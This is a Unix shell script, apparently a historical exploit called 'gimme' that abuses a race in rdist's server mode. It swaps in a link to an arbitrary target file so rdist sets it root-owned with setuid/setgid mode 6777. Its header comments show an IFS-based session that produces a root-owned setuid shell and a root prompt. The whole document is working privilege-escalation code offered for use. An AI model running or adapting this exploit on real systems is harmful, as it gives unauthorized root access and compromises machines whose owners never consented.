#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme  [ []]
#        is the target file.
#        is the octal mode to which the file access permission
#               should be set.  Note that this may not be effective unless
#               either the SUID (4000) or SGID (2000) bits are also requested.
#        is the target directory for rdist to use if a hard
#               link is desired.  Note that the user must have permission
#               to create this directory it must be on the same filesystem
#               as the target file and the target file must not be a
#               directory.  This option is necessary to change the ownership
#               of the target if chown() of a symbolic link modifies the
#               link itself and not the file it refers to.
#
# (Lines marked with > represent user input)
#
# >       % cp /bin/sh .
# >       % cc -o usr usr.c
# >       % set path=(. $path)
# >       % setenv IFS /
# >       % rdist
# updating host localhost
# rdist: BullInTheHeather: No such file or directory
# notify @localhost ( user )
# >       % ls -l
# -rwsr-xr-x  1 root       106496 Mar  4 00:25 sh
# >       % ./sh
# #

dirname=gimme$$
deftemp=/tmp
defperm=6777

if [ $1x = x ]; then
echo "Usage: $0  [ []]" >&2
exit 1
fi

if [ $2x != x ]; then
perm=$2
else
perm=$defperm
fi

if [ $3x != x ]; then
link="ln"
temp=$3/$dirname
target=$1
else
link="ln -s"
temp=$deftemp/$dirname
case $1 in
/*)
target=$1
;;
*)
target=`pwd`/$1
;;
esac
fi

trap "rm -fr $temp; exit 1"  1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
exit 1
fi

set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
shift
done
group=$1

(
echo "t$temp/something"
echo "R0 $perm 1 0 $user $group "

while [ ! -f $temp/rdist* ]; do
sleep 1
done

set $temp/rdist*
rm -f $1
if $link $target $1 >&2; then
echo "" | dd bs=3 conv=sync 2>/dev/null
echo ""

echo 0 > $temp/status
else
echo 1 > $temp/status
fi

exit
) | rdist -Server

status=`cat $temp/status`
rm -fr $temp
exit $status

